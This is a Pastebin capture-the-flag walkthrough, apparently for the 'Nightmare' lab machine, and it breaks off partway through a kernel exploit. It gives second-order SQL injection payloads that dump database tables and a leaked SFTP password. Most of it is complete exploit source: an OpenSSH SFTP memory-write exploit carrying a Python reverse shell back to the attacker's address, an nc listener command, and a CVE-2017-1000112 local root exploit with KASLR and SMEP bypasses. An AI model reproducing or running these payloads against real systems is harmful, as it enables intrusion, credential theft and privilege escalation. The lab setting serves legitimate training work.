Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- lets begin the Nightmare
- i find there is the second order sql injection in register page
- open http://10.10.10.66/register.php
- goto inspect element change user char maxlength="30" to "" than put in user field
- username : ') UNION select table_schema,table_name FROM information_Schema.tables;#
- password :any you want just register than login with same details
- after login voila u find there is sysadmin user lets see what is inside there
- to see the data logout first goto register page again and change the max length to unlimited
- now put
- username:') union select * from sysadmin.users#
- password: anything u want
- signup and login voila u found many username and password but i think ftpuser will work
- ftpuser
- @whereyougo?
- that is sftp
- we found exploit https://github.com/0x90/openssh-sftp-sploit/blob/master/sshsploit.c
- need to modify
- if (argc != 5) fprintf(stderr, "invocation: ./exploit host port user 'shell commands here'\n"), exit(1);
- remove this on code
- change and add
- char target_host[] = "10.10.10.66";
- char target_user[] = "ftpuser";
- int port=2222;
- char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&";
- printf("Commands: %s\n",shell_commands);
- ssh_session my_ssh_session;
- int rc;
- char password[]="@whereyougo?";
- // Authenticate ourselves
- //password = "@whereyougo?";
- rc = ssh_userauth_password(my_ssh_session, NULL, password);
- if (rc != SSH_AUTH_SUCCESS)
- remove /lib/x86_64-linux-gnu/libc-2.13.so this
- change
- unsigned int start_addr, end_addr, offset;
- char *libc_path = NULL;
- unsigned int stack_start_addr = 0, stack_end_addr;
- char *system_offset_str;
- slurp_file("system.addr", &system_offset_str);
- unsigned int system_offset;
- if (sscanf(system_offset_str, "%x", &system_offset) != 1) perror("scanf failed"), exit(1);
- unsigned int remote_system_addr = start_addr+system_offset-offset;
- printf("remote system() function is at %x\n", remote_system_addr);
- printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
- char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
- if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
- unsigned int gadget_address = start_addr + (gadget-(libc+offset));
- unsigned int ret_address = gadget_address+1;
- printf("found gadget at %x\n", gadget_address);
- printf("remote stack is at %x-%x\n", stack_start_addr, stack_end_addr);
- printf("doing it the quick-and-dirty way (that means: pray that the target"
- "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
- unsigned int stack_len = stack_end_addr - stack_start_addr;
- if (stack_len > 32000) {
- stack_len = 32000;
- stack_start_addr = stack_end_addr - stack_len;
- }
- printf("here1\n");
- char *new_stack = malloc(stack_len);
- printf("here2\n");
- printf("sizeofint = %u\n",sizeof(int));
- // first fill it with our ret slide
- for (unsigned int *s = (void*)new_stack; s < (unsigned int*)(new_stack+stack_len); s++) {
- *s = ret_address;
- }
- // put some shell commands in the head
- strcpy(new_stack, shell_commands);
- // put the mini-ROP-chain at the end
- // [address of pop rdi] [stack head] [address of system]
- unsigned int *se = (void*)(new_stack + stack_len);
- se[-3] = remote_system_addr;
- se[-2] = gadget_address;
- se[-1] = stack_start_addr;
- // now send over the rest right-to-left
- for (unsigned int off = stack_len-32000; off >= 0; off -= 32000) {
- after modify
- let save it in shell.c
- /*
- OpenSSH <=6.6 SFTP misconfiguration exploit for 64bit Linux
- Link:
- http://seclists.org/fulldisclosure/2014/Oct/35
- Build:
- gcc sshsploit.c -o sshsploit -std=c99 -lssh
- Usage:
- ./ssh sploit host port user command
- */
- #define _GNU_SOURCE
- // THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
- // TRY TO ATTACK BACK, THE CODE IS SLOPPY!
- // (In other words, please don't use this against other people's machines.)
- #include <libssh/libssh.h>
- #include <libssh/sftp.h>
- #include <stdlib.h>
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <string.h>
- #include <errno.h>
- #define min(a,b) (((a)<(b))?(a):(b))
- sftp_session sftp;
- size_t grab_file(char *rpath, char **out) {
- size_t allocated = 4000, used = 0;
- *out = calloc(1, allocated+1);
- sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
- if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
- while (1) {
- ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
- if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
- if (nbytes == 0) {
- (*out)[used] = '\0';
- sftp_close(f);
- return used;
- }
- used += nbytes;
- if (used == allocated) {
- allocated *= 4;
- *out = realloc(*out, allocated);
- }
- }
- }
- void dump_file(char *name, void *buf, size_t len) {
- FILE *f = fopen(name, "w+");
- if (!f) perror("can't write to local file"), exit(1);
- if (fwrite(buf, 1, len, f) != len) fprintf(stderr, "local write failed\n"), exit(1);
- if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
- }
- size_t slurp_file(char *path, char **out) {
- size_t allocated = 4000, used = 0;
- *out = calloc(1, allocated+1);
- FILE *f = fopen(path, "r");
- if (f == NULL) perror("opening local file failed"), exit(1);
- while (1) {
- ssize_t nbytes = fread(*out+used, 1, allocated-used, f);
- if (nbytes < 0) fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno)), exit(1);
- if (nbytes == 0) {
- (*out)[used] = '\0';
- if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
- return used;
- }
- used += nbytes;
- if (used == allocated) {
- allocated *= 4;
- *out = realloc(*out, allocated);
- }
- }
- }
- int main(int argc, char **argv) {
- char target_host[] = "10.10.10.66";
- char target_user[] = "ftpuser";
- int port=2222;
- char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&";
- printf("Commands: %s\n",shell_commands);
- int verbosity = SSH_LOG_PROTOCOL;
- ssh_session my_ssh_session;
- int rc;
- char password[]="@whereyougo?";
- // Open session and set options
- my_ssh_session = ssh_new();
- if (my_ssh_session == NULL) exit(-1);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_LOG_VERBOSITY, &verbosity);
- // Connect to server
- rc = ssh_connect(my_ssh_session);
- if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
- // Authenticate ourselves
- //password = "@whereyougo?";
- rc = ssh_userauth_password(my_ssh_session, NULL, password);
- if (rc != SSH_AUTH_SUCCESS)
- fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
- sftp = sftp_new(my_ssh_session);
- if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
- rc = sftp_init(sftp);
- if (rc != SSH_OK) {
- fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
- sftp_free(sftp);
- return rc;
- }
- char *mappings;
- grab_file("/proc/self/maps", &mappings);
- //printf("/proc/self/maps dump: \n%s\n\n\n", mappings);
- printf("got /proc/self/maps. looking for libc...\n");
- // 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466 /lib/x86_64-linux-gnu/libc-2.13.so
- unsigned int start_addr, end_addr, offset;
- char *libc_path = NULL;
- unsigned int stack_start_addr = 0, stack_end_addr;
- for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
- if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
- if (libc_path) fprintf(stderr, "warning: two times libc?\n");
- printf("mapping line: %s\n", p);
- if (sscanf(p, "%x-%x %*4c %x", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
- libc_path = strdup(strchr(p, '/'));
- if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
- }
- if (strstr(p, "[stack]")) {
- if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
- printf("mapping line: %s\n", p);
- if (sscanf(p, "%x-%x ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
- }
- }
- if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
- if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
- printf("remote libc is at %s\n", libc_path);
- printf("offset %x from libc is mapped to %x-%x\n", offset, start_addr, end_addr);
- char *libc;
- size_t libc_size = grab_file(libc_path, &libc);
- dump_file("libc.so", libc, libc_size);
- printf("downloaded libc, size is %zu bytes\n", libc_size);
- system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
- char *system_offset_str;
- slurp_file("system.addr", &system_offset_str);
- unsigned int system_offset;
- if (sscanf(system_offset_str, "%x", &system_offset) != 1) perror("scanf failed"), exit(1);
- unsigned int remote_system_addr = start_addr+system_offset-offset;
- printf("remote system() function is at %x\n", remote_system_addr);
- printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
- char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
- if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
- unsigned int gadget_address = start_addr + (gadget-(libc+offset));
- unsigned int ret_address = gadget_address+1;
- printf("found gadget at %x\n", gadget_address);
- printf("remote stack is at %x-%x\n", stack_start_addr, stack_end_addr);
- printf("doing it the quick-and-dirty way (that means: pray that the target"
- "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
- unsigned int stack_len = stack_end_addr - stack_start_addr;
- if (stack_len > 32000) {
- stack_len = 32000;
- stack_start_addr = stack_end_addr - stack_len;
- }
- printf("here1\n");
- char *new_stack = malloc(stack_len);
- printf("here2\n");
- printf("sizeofint = %u\n",sizeof(int));
- // first fill it with our ret slide
- for (unsigned int *s = (void*)new_stack; s < (unsigned int*)(new_stack+stack_len); s++) {
- *s = ret_address;
- }
- // put some shell commands in the head
- strcpy(new_stack, shell_commands);
- // put the mini-ROP-chain at the end
- // [address of pop rdi] [stack head] [address of system]
- unsigned int *se = (void*)(new_stack + stack_len);
- se[-3] = remote_system_addr;
- se[-2] = gadget_address;
- se[-1] = stack_start_addr;
- printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
- sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
- if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);
- // first send over the string
- rc = sftp_seek(mem, stack_start_addr);
- if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
- ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
- if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");
- // now send over the rest right-to-left
- for (unsigned int off = stack_len-32000; off >= 0; off -= 32000) {
- rc = sftp_seek(mem, stack_start_addr+off);
- if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
- mem_written = sftp_write(mem, new_stack+off, 32000);
- if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good :)\n"), exit(0);
- }
- return 0;
- }
- change your ip and and compiled it don't change port because nightmare doesn't accept any other port except 80 and 443
- gcc shell.c -o shell -std=c99 -lssh
- start nc
- nc -lvnp 80
- ./shell
- u will get shell
- after than
- put on nc /usr/bin/sls -b '
- bash -ip'
- than u become decoder group shell
- after than u can see user hash to get root we have to use kernel exploit
- see there uname -an
- after searching we get kernel exploit
- https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
- to see author link we will modify it https://ricklarabee.blogspot.in/2017/12/adapting-poc-for-cve-2017-1000112-to.html
- now lets modify some details
- change
- // Will be overwritten by detect_versions().
- int kernel = 38;
- i think i have everything i have modified
- now save this in poc.c in your system
- // A proof-of-concept local root exploit for CVE-2017-1000112.
- // Includes KASLR and SMEP bypasses. No SMAP bypass.
- // Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.
- //
- // Usage:
- // user@ubuntu:~$ uname -a
- // Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
- // user@ubuntu:~$ whoami
- // user
- // user@ubuntu:~$ id
- // uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
- // user@ubuntu:~$ gcc pwn.c -o pwn
- // user@ubuntu:~$ ./pwn
- // [.] starting
- // [.] checking distro and kernel versions
- // [.] kernel version '4.8.0-58-generic' detected
- // [~] done, versions looks good
- // [.] checking SMEP and SMAP
- // [~] done, looks good
- // [.] setting up namespace sandbox
- // [~] done, namespace sandbox set up
- // [.] KASLR bypass enabled, getting kernel addr
- // [~] done, kernel text: ffffffffae400000
- // [.] commit_creds: ffffffffae4a5d20
- // [.] prepare_kernel_cred: ffffffffae4a6110
- // [.] SMEP bypass enabled, mmapping fake stack
- // [~] done, fake stack mmapped
- // [.] executing payload ffffffffae40008d
- // [~] done, should be root now
- // [.] checking if we got root
- // [+] got r00t ^_^
- // root@ubuntu:/home/user# whoami
- // root
- // root@ubuntu:/home/user# id
- // uid=0(root) gid=0(root) groups=0(root)
- // root@ubuntu:/home/user# cat /etc/shadow
- // root:!:17246:0:99999:7:::
- // daemon:*:17212:0:99999:7:::
- // bin:*:17212:0:99999:7:::
- // sys:*:17212:0:99999:7:::
- // ...
- //
- // Andrey Konovalov <andreyknvl@gmail.com>
- #define _GNU_SOURCE
- #include <assert.h>
- #include <errno.h>
- #include <fcntl.h>
- #include <sched.h>
- #include <stdarg.h>
- #include <stdbool.h>
- #include <stdint.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
- #include <linux/socket.h>
- #include <netinet/ip.h>
- #include <sys/klog.h>
- #include <sys/mman.h>
- #include <sys/utsname.h>
- #define ENABLE_KASLR_BYPASS 1
- #define ENABLE_SMEP_BYPASS 1
- // Will be overwritten if ENABLE_KASLR_BYPASS is enabled.
- unsigned long KERNEL_BASE = 0xffffffff81000000ul;
- // Will be overwritten by detect_versions().
- int kernel = 38;
- struct kernel_info {
- const char* distro;
- const char* version;
- uint64_t commit_creds;
- uint64_t prepare_kernel_cred;
- uint64_t xchg_eax_esp_ret;
- uint64_t pop_rdi_ret;
- uint64_t mov_dword_ptr_rdi_eax_ret;
- uint64_t mov_rax_cr4_ret;
- uint64_t neg_rax_ret;
- uint64_t pop_rcx_ret;
- uint64_t or_rax_rcx_ret;
- uint64_t xchg_eax_edi_ret;
- uint64_t mov_cr4_rdi_ret;
- uint64_t jmp_rcx;
- };
- struct kernel_info kernels[] = {
- { "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },
- { "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },
- { "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
- { "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
- { "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
- { "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },
- { "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },
- { "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },
- { "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },
- { "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
- { "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
- { "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
- { "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
- };
- // Used to get root privileges.
- #define COMMIT_CREDS (KERNEL_BASE + kernels[kernel].commit_creds)
- #define PREPARE_KERNEL_CRED (KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
- // Used when ENABLE_SMEP_BYPASS is used.
- // - xchg eax, esp ; ret
- // - pop rdi ; ret
- // - mov dword ptr [rdi], eax ; ret
- // - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret
- // - neg rax ; ret
- // - pop rcx ; ret
- // - or rax, rcx ; ret
- // - xchg eax, edi ; ret
- // - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret
- // - jmp rcx
- #define XCHG_EAX_ESP_RET (KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)
- #define POP_RDI_RET (KERNEL_BASE + kernels[kernel].pop_rdi_ret)
- #define MOV_DWORD_PTR_RDI_EAX_RET (KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)
- #define MOV_RAX_CR4_RET (KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)
- #define NEG_RAX_RET (KERNEL_BASE + kernels[kernel].neg_rax_ret)
- #define POP_RCX_RET (KERNEL_BASE + kernels[kernel].pop_rcx_ret)
- #define OR_RAX_RCX_RET (KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)
- #define XCHG_EAX_EDI_RET (KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)
- #define MOV_CR4_RDI_RET (KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)
- #define JMP_RCX (KERNEL_BASE + kernels[kernel].jmp_rcx)
- // * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
- typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
- typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
- void get_root(void) {
- ((_commit_creds)(COMMIT_CREDS))(
- ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));
- }
- // * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *
- uint64_t saved_esp;
- // Unfortunately GCC does not support `__atribute__((naked))` on x86, which
- // can be used to omit a function's prologue, so I had to use this weird
- // wrapper hack as a workaround. Note: Clang does support it, which means it
- // has better support of GCC attributes than GCC itself. Funny.
- void wrapper() {
- asm volatile (" \n\
- payload: \n\
- movq %%rbp, %%rax \n\
- movq $0xffffffff00000000, %%rdx \n\
- andq %%rdx, %%rax \n\
- movq %0, %%rdx \n\
- addq %%rdx, %%rax \n\
- movq %%rax, %%rsp \n\
- call get_root \n\
- ret \n\
- " : : "m"(saved_esp) : );
- }
- void payload();
- #define CHAIN_SAVE_ESP \
- *stack++ = POP_RDI_RET; \
- *stack++ = (uint64_t)&saved_esp; \
- *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
- #define SMEP_MASK 0x100000
- #define CHAIN_DISABLE_SMEP \
- *stack++ = MOV_RAX_CR4_RET; \
- *stack++ = NEG_RAX_RET; \
- *stack++ = POP_RCX_RET; \
- *stack++ = SMEP_MASK; \
- *stack++ = OR_RAX_RCX_RET; \
- *stack++ = NEG_RAX_RET; \
- *stack++ = XCHG_EAX_EDI_RET; \
- *stack++ = MOV_CR4_RDI_RET;
- #define CHAIN_JMP_PAYLOAD \
- *stack++ = POP_RCX_RET; \
- *stack++ = (uint64_t)&payload; \
- *stack++ = JMP_RCX;
- void mmap_stack() {
- uint64_t stack_aligned, stack_addr;
- int page_size, stack_size, stack_offset;
- uint64_t* stack;
- page_size = getpagesize();
- stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);
- stack_addr = stack_aligned - page_size * 4;
- stack_size = page_size * 8;
- stack_offset = XCHG_EAX_ESP_RET % page_size;
- stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,
- MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
- if (stack == MAP_FAILED || stack != (void*)stack_addr) {
- perror("[-] mmap()");
- exit(EXIT_FAILURE);
- }
- stack = (uint64_t*)((char*)stack_aligned + stack_offset);
- CHAIN_SAVE_ESP;
- CHAIN_DISABLE_SMEP;
- CHAIN_JMP_PAYLOAD;
- }
- // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
- #define SYSLOG_ACTION_READ_ALL 3
- #define SYSLOG_ACTION_SIZE_BUFFER 10
- void mmap_syslog(char** buffer, int* size) {
- *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
- if (*size == -1) {
- perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
- exit(EXIT_FAILURE);
- }
- *size = (*size / getpagesize() + 1) * getpagesize();
- *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
- MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
- *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
- if (*size == -1) {
- perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
- exit(EXIT_FAILURE);
- }
- }
- unsigned long get_kernel_addr_trusty(char* buffer, int size) {
- const char* needle1 = "Freeing unused";
- char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
- if (substr == NULL) {
- fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1);
- exit(EXIT_FAILURE);
- }
- int start = 0;
- int end = 0;
- for (end = start; substr[end] != '-'; end++);
- const char* needle2 = "ffffff";
- substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
- if (substr == NULL) {
- fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2);
- exit(EXIT_FAILURE);
- }
- char* endptr = &substr[16];
- unsigned long r = strtoul(&substr[0], &endptr, 16);
- r &= 0xffffffffff000000ul;
- return r;
- }
- unsigned long get_kernel_addr_xenial(char* buffer, int size) {
- const char* needle1 = "Freeing unused";
